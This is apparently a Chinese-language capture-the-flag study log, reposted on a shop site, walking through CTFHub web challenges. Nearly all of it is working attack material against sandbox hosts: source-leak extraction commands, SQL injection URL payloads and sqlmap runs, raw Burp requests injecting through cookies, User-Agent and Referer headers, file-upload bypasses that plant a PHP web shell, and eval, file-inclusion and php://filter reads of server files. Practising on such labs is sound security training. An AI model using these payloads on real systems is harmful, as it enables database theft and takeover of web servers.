CTF——Web学习记录

时间：2023-01-16 05:00:00 80f薄膜电容 t311a系列压力变送器

CTFHUB——log（git泄露）

在kali中使用GitHack

python GitHack.py http://challenge-4be834ffe995c3a3.sandbox.ctfhub.com:10800/.git ///日志文件将保存到GitHack目录中的dist目录下 git log git diff 91722f3ef9cad1bb2841623dd18efcf5966dbd32 //查看flag

CTFHUB——Stash（git泄露）

git stash list git stash pop //注意使用root权限

CTFHUB——Index（git泄露）

python2 GitHack.py http://challenge-b30f32f8760f958c.sandbox.ctfhub.com:10800/.git

CTFHUB——SVN泄露

//先进入工具目录 ./rip-svn.pl -v -u http://challenge-db225928ae10d29a.sandbox.ctfhub.com:10800/.svn ls -al cd .svn cd pristine cd 87 ls -al cat 87cfa68f3ad388cc5010e87eb92ae7210a6564c9.svn-base

CTFHUB——HG泄露

./rip-hg.pl -v -u http://challenge-fd4d14ab800ba8d3.sandbox.ctfhub.com:10800/.hg/ cd .hg cd store cat fncache //得到data/flag_1296924402.txt.i，直接访问该文件

CTFHUB——SQL整数型注入

http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=1 order by 2  http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,2  http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,database()  http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata  http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'  http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(column_name)from information_schema.columns where table_name='flag' and table_schema='sqli'  http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(flag)from sqli.flag

#用Sqlmap辅助 py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 --current-db py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -dbs py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns --batch py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

CTFHUB——SQL字符型注入

1.加单引号报错 http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1' 2、加'and 1=1 -- ' http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1'and 1=1 -- ' ///这个注释符后面有一个空间 3、加'and 1=2 -- '--报错 通过以上三个步骤，可以确定字符注入  order by 若超过其列数，则报错；若恰好等于列数，显示$id=1的结果  http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1' order by 2 -- ' 判断回显位置 http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,2 -- '' 开始查数据 http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,user()  -- '' http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,version()  -- '' http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,database()  -- '' http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(schema_name)from information_schema.schemata  -- '' http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'  -- '' http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag'  -- '' http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(flag)from sqli.flag  -- ''

#用sqlmap辅助注入 py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -dbs --batch py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch

CTFHUB——SQL报错注入

http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,database(),0x7e),1) http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1) http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema="sqli" and table_name='flag') ,0x7e),1) #得到flag左半段(因回显长度有限) http://challenge-fb5b12dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag) ,0x7e),1)
#用right（）将后半段显示出来
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag) ,31),0x7e),1)

#用sqlmap辅助注入
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -dbs --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch

CTFHUB——SQL布尔盲注

CTFHUB——MySQL结构

#这两种建议使用BP或者sqlmap辅助注入

CTFHUB——Cookie注入

#使用sqlmap
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 --dbs
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli --tables --batch
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ktyrpqqkjq -C dmcwxicbvc --dump

#使用BP
GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='tjhiangrvk'; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,igdqkfgoxs from sqli.tjhiangrvk; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

CTFHUB——UA注入

#sqlmap
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 --dbs --batch
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 -D sqli -T dgcskfxmlw --dump --batch

#BP
GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='wexbewzepo' #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,sxuftpsmzo from sqli.wexbewzepo #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

CTFHUB——Reffer注入

#sqlmap 把level提高到5，时间可能会有点长
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=5 --dbs --batch

#BP要先POST数据，然后再抓包，才会有Refer
POST / HTTP/1.1
Host: challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Length: 4
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: -1 union select 1,group_concat(fxjlcnquao)from sqli.jutobmzrfj
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

id=1

CTFHUB——过滤空格

#sqlmap
py sqlmap.py -u http://challenge-9f6b26b103520285.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --tamper space2comment.py
以下省略

#手工注入
绕过空格过滤的方式： /**/、()、%0a

CTFHUB——MIME绕过

POST / HTTP/1.1
Host: challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Length: 311
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypThKx4ZJTFtPj3di
#这里是给出服务器表单的开始和结束的位置，不是验证文件类型的
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="file"; filename="muma.php"
Content-Type: image/jpeg
#改这里！！！这里才是验证文件类型的地方


------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundarypThKx4ZJTFtPj3di--

CTFHUB——00截断

BP抓包上传muma.php并修改请求报文即可
POST /?road=/var/www/html/upload/muma.php%00.jpg HTTP/1.1
#改这里！！！
Host: challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Length: 318
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygRXig2JtdVHb7oLO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800/?road=/var/www/html/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="file"; filename="muma.php%00.jpg"
Content-Type: image/jpeg


------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundarygRXig2JtdVHb7oLO--

然后蚁剑连接网址+upload/muma.php

CTFHUB——双写后缀

#php里套个php

CTFHUB——文件头检查

gif文件用记事本打开，在后面加一句话木马
然后bp抓包改文件后缀

CTFHUB——eval执行

http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("ls /");
http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_6055");

CTFHUB——文件包含

#源代码中有include先包含目录中自带的shell.txt
http://challenge-d95f20cfaac12c8b.sandbox.ctfhub.com:10800/?file=shell.txt
#然后POST数据
ctfhub=system("ls /");
ctfhub=system("cat /flag");

CTFHUB——php://input

#BP抓包，然后改为POST请求并加入php:/input伪协议，再传入php指令
POST /?file=php://input HTTP/1.1
Host: challenge-8a0b4a527d4aa825.sandbox.ctfhub.com:10800
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type:application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 33

CTFHUB——读取源代码

#知道了flag在/flag中
所以直接构造url http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/resource=/flag
#或者可以用base64编码输出
http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/read=convert.base64-encode/resource=/flag

锐单商城拥有海量元器件数据手册、IC替代型号，打造电子元器件IC百科大全！

CTF——Web学习记录

CTFHUB——log（git泄露）

CTFHUB——Stash（git泄露）

CTFHUB——Index（git泄露）

CTFHUB——SVN泄露

CTFHUB——HG泄露

CTFHUB——SQL整数型注入

CTFHUB——SQL字符型注入

CTFHUB——SQL报错注入

CTFHUB——SQL布尔盲注

CTFHUB——MySQL结构

CTFHUB——Cookie注入

CTFHUB——UA注入

CTFHUB——Reffer注入

CTFHUB——过滤空格

CTFHUB——MIME绕过

CTFHUB——00截断

CTFHUB——双写后缀

CTFHUB——文件头检查

CTFHUB——eval执行

CTFHUB——文件包含

CTFHUB——php://input

CTFHUB——读取源代码

相关文章